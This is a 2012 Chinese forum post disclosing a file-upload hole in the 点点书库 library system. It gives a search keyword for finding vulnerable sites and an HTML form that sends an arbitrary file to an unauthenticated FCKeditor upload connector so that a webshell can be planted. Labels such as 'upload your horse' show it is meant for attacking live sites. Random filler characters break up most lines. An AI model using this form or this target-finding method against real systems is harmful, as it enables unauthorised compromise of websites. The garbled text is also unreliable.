主题:图书馆系统任意文件上传漏洞2 }/ D1 A6 `" n! X2 T/ T, J
作者:冰锋刺客' `: e7 ], [! ?; o
厂商:点击书(dianjishu.com). q4 i b: g0 G, F2 n8 G
日期:2012-6-21" q7 ]- i# x8 ]/ @& D( N2 M' C
) |; L& Z2 Z: x3 I" uI 概述# ^# S6 r' x7 B
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
( J3 R6 p$ } v* o' Z II 简介
7 H1 V- L, k, z5 ~" I 关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
# e; q- N0 y& k5 |9 F0 n 补充一个漏洞
6 \! y9 b4 R& d/ z- W, b5 F <form id="frmUpload" enctype="multipart/form-data"( ~3 E- J3 V7 o; g
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>2 a& ~7 d% }! c8 @* O4 _ Z% r
<input id="btnUpload" type="submit" value="操翻他">. w2 x6 n% D3 s+ Z; D/ c& n
</form>
U$ N7 n5 G1 b3 b% b- Q, @ 你们懂的8 p+ s, w( N* L* n/ g; a! `$ J
那傻逼提供还需要改包.8 Q% l( q- M! l
自己看了下源代码发现fckeditor
6 G% H& O: z& N! [) H0 l 直接秒杀
* D4 |7 e: {* Y$ M |
发表于 2012-9-10 21:20:59
收藏
支持
反对